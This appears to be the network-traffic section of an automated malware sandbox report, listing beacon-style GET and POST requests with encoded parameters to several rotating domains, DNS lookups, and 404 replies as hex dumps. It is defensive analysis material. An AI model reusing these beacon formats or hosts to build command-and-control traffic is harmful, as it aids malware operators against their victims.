            Source: global trafficHTTP traffic detected: GET /3qit/?H0QP6=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&OXVx9=WNjT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 218Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d Data Ascii: H0QP6=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:48 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:50 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:35:56 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:36:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 